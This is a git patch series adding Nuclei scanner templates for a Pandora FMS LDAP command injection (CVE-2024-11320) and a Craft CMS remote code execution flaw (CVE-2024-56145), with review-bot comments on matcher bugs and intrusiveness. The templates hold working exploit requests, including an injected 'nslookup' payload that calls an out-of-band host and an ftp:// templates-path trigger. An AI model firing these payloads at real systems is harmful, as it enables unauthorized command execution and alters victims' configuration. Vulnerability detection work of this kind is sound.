From 7ebb7eee317cf4b66a97f7e89638616bffe1dbc9 Mon Sep 17 00:00:00 2001 From: shubhamrooter <147608529+shubhamrooter@users.noreply.github.com> Date: Mon, 2 Dec 2024 15:03:35 +0530 Subject: [PATCH 1/3] Add files via upload --- http/cves/2024/CVE-2024-11320.yaml | 36 ++++++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 http/cves/2024/CVE-2024-11320.yaml diff --git a/http/cves/2024/CVE-2024-11320.yaml b/http/cves/2024/CVE-2024-11320.yaml new file mode 100644 index 00000000000..79ff39fdca3 --- /dev/null +++ b/http/cves/2024/CVE-2024-11320.yaml @@ -0,0 +1,36 @@ +id: pandora-remote-code-execution-CVE-2024-11320 +info: + name: Pandora v7.0NG.777.3 Remote Code Execution + author: Shubham Rooter + severity: critical + description: | + Exploit for Pandora v7.0NG.777.3 Andromeda that allows remote code execution via LDAP injection in the authentication section. + tags: exploit, rce + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?login=1" + matchers: + - type: word + words: + - 'hidden-csrf_code' + extractors: + - type: regex + name: csrf_token + group: 1 + regex: + - 'name="csrf_code" value="([^"]+)"' + + - method: POST + path: + - "{{BaseURL}}/index.php?login=1" + body: | + nick={{Username}} + &pass={{Password}} + &login_button=Let's+go + &csrf_code={{csrf_token}} + matchers: + - type: word + words: + - 'Valid Session' From 6e4e31ffcfcd8f2074437452f4358631081e264b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 4 Dec 2024 20:19:47 +0530 Subject: [PATCH 2/3] fixing-template --- http/cves/2024/CVE-2024-11320.yaml | 118 ++++++++++++++++++++++------- 1 file changed, 91 insertions(+), 27 deletions(-) diff --git a/http/cves/2024/CVE-2024-11320.yaml b/http/cves/2024/CVE-2024-11320.yaml index 79ff39fdca3..75e012b1c01 100644 --- a/http/cves/2024/CVE-2024-11320.yaml +++ b/http/cves/2024/CVE-2024-11320.yaml 
@@ -1,36 +1,100 @@ -id: pandora-remote-code-execution-CVE-2024-11320 +id: CVE-2024-11320 + info: - name: Pandora v7.0NG.777.3 Remote Code Execution - author: Shubham Rooter + name: Pandora v7.0NG.777.3 - Remote Code Execution + author: DhiyaneshDK,Shubham Rooter severity: critical description: | - Exploit for Pandora v7.0NG.777.3 Andromeda that allows remote code execution via LDAP injection in the authentication section. - tags: exploit, rce + Arbitrary commands execution on the server by exploiting a command injection vulnerability in the LDAP authentication mechanism. This issue affects Pandora FMS- from 700 through <=777.4 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-11320 + cwe-id: CWE-77 + epss-score: 0.00043 + epss-percentile: 0.10436 + cpe: cpe:2.3:a:pandorafms:pandora_fms:*:*:*:*:*:*:*:* + metadata: + vendor: pandorafms + product: pandora_fms + shodan-query: + - http.html:"pandora fms - installation wizard" + - http.title:"pandora fms" + fofa-query: + - body="pandora fms - installation wizard" + - title="pandora fms" + google-query: intitle:"pandora fms" + +flow: http(1) && http(2) && http(3) && http(4) && http(5) + +http: + - raw: + - | + GET /index.php?login=1 HTTP/1.1 + Host: {{Hostname}} -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?login=1" - matchers: - - type: word - words: - - 'hidden-csrf_code' extractors: - type: regex - name: csrf_token + name: csrf_code group: 1 regex: - - 'name="csrf_code" value="([^"]+)"' - - - method: POST - path: - - "{{BaseURL}}/index.php?login=1" - body: | - nick={{Username}} - &pass={{Password}} - &login_button=Let's+go - &csrf_code={{csrf_token}} + - 'name="csrf_code" type="hidden" value="([a-z0-9]+)" \/>' + internal: true + + - raw: + - | + POST /index.php?login=1 HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + nick={{username}}&pass={{password}}&login_button=Let%27s+go&csrf_code={{csrf_code}} + + 
matchers: + - type: dsl + dsl: + - status_code == 302 + - contains(set_cookie, 'PHPSESSID=') + condition: and + internal: true + + - raw: + - | + GET /index.php?logged=1&sec=general/logon_ok HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - status_code == 200 + - contains(body, 'Server health') + condition: and + internal: true + + - raw: + - | + GET /index.php?sec=general&sec2=godmode/setup/setup§ion=auth HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - status_code == 200 + - contains_all(body, 'Authentication method', 'LDAP') + condition: and + internal: true + + - raw: + - | + POST /index.php?sec=general&sec2=godmode/setup/setup§ion=auth HTTP/1.1 + Host: {{Hostname}} + Referer: {{RootURL}}/index.php?sec=general&sec2=godmode/setup/setup§ion=auth + Content-Type: application/x-www-form-urlencoded + + update_config=1&csrf_code={{csrf_code}}&auth=ldap&fallback_local_auth=1&fallback_local_auth_sent=1&ldap_server=localhost&ldap_port=389&ldap_version=3&ldap_start_tls_sent=1&ldap_base_dn=ou%3DPeople%2Cdc%3Dedu%2Cdc%3Dexample%2Cdc%3Dorg&ldap_login_attr=uid&ldap_admin_login=%27%3Bnslookup+{{interactsh-url}}+%23&ldap_admin_pass=test&ldap_search_timeout=0&secondary_ldap_enabled_sent=1&ldap_server_secondary=localhost&ldap_port_secondary=389&ldap_version_secondary=3&ldap_start_tls_secondary_sent=1&ldap_base_dn_secondary=ou%3DPeople%2Cdc%3Dedu%2Cdc%3Dexample%2Cdc%3Dorg&ldap_login_attr_secondary=uid&ldap_admin_login_secondary=&ldap_admin_pass_secondary=&double_auth_enabled_sent=1&2FA_all_users_sent=1&session_timeout=90&update_button=Update&ldap_function=local + matchers: - - type: word - words: - - 'Valid Session' + - type: dsl + dsl: + - status_code == 200 + - contains(body,'Correctly updated the setup options') + condition: and From 3429f97e27faa701174302d94c4c0daa1f98280f Mon Sep 17 00:00:00 2001 
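Review bot: The final request's matchers only confirm that the setup form was accepted (`status_code == 200` and `contains(body,'Correctly updated the setup options')`); a patched instance that sanitizes `ldap_admin_login` returns the same message, so the template reports a critical finding with no evidence that the injected `nslookup {{interactsh-url}}` ever ran. Since the payload already carries an interactsh URL, the decisive check should be the out-of-band callback — a second matcher with `part: interactsh_protocol`, as the Craft CMS template later in this series does — combined with the existing ones under `condition: and`. The same request also rewrites the target's authentication settings (`auth=ldap`, `ldap_server=localhost`, admin bind credentials) and nothing in the flow restores the previous values, so a scan leaves production configuration changed; the template should carry the usual `intrusive` and `authenticated` tags, yet the rewritten info block dropped `tags:` entirely and has no `reference:` line. The hunk covers the whole file, so the earlier requests of this flow sit on the previous line of this chunk.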
From: shubhamrooter <147608529+shubhamrooter@users.noreply.github.com> Date: Fri, 20 Dec 2024 12:20:20 +0530 Subject: [PATCH 3/3] Add files via upload --- http/cves/2024/cve-2024-56145.yaml | 57 ++++++++++++++++++++++++++++++ 1 file changed, 57 insertions(+) create mode 100644 http/cves/2024/cve-2024-56145.yaml diff --git a/http/cves/2024/cve-2024-56145.yaml b/http/cves/2024/cve-2024-56145.yaml new file mode 100644 index 00000000000..74f7f0ee134 --- /dev/null +++ b/http/cves/2024/cve-2024-56145.yaml @@ -0,0 +1,57 @@ +id: cve-2024-56145 + +info: + name: Craft CMS Remote Code Execution (RCE) + author: Shubham Rooter + severity: critical + description: | + Craft CMS suffers from a Remote Code Execution (RCE) vulnerability due to improper handling of the `--configPath` parameter. + This template checks if the target is vulnerable and exploits it by triggering a reverse shell. + reference: + - https://www.assetnote.io/resources/research/how-an-obscure-php-footgun-led-to-rce-in-craft-cms + tags: cve,cve2024,rce,craftcms + +requests: + - method: GET + path: + - "{{BaseURL}}?--configPath=/{{randstr}}" + + matchers-condition: and + matchers: + - type: status + status: + - 503 + + - type: word + words: + - "mkdir()" + part: body + + extractors: + - type: regex + part: body + regex: + - "mkdir\\(\\)" + + - method: GET + path: + - "{{BaseURL}}?--templatesPath=ftp://{{interactsh-url}}" + + payloads: + default: + - "{{interactsh-payload}}" + + attack: pitchfork + threads: 10 + + matchers: + - type: regex + regex: + - "{{interactsh-placeholder}}" + part: interactsh_protocol + + extractors: + - type: regex + part: interactsh_protocol + regex: + - "{{interactsh-placeholder}}"
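Review bot: The second request's matcher and extractor compare `interactsh_protocol` against `{{interactsh-placeholder}}`, and the `payloads` block defines `default: {{interactsh-payload}}` that no request references; neither name is a variable this template defines, so the out-of-band check can never match and the `attack: pitchfork` / `threads: 10` fan-out is dead weight. The usual form is a word matcher on the callback protocol, e.g. `- type: word` / `part: interactsh_protocol` / `words: - dns`, with the payloads block removed. The description also promises that the template "exploits it by triggering a reverse shell", which nothing in the file does — it sends a `ftp://{{interactsh-url}}` templates path and waits for a callback — so the wording should describe that check instead. Separately, this file still uses the deprecated `requests:` key and a lowercase `id: cve-2024-56145` and filename, while the second commit in this series moved the Pandora template to `http:` and an uppercase `CVE-…` id; the first request's extractor of the constant `mkdir\(\)` adds nothing and could be dropped.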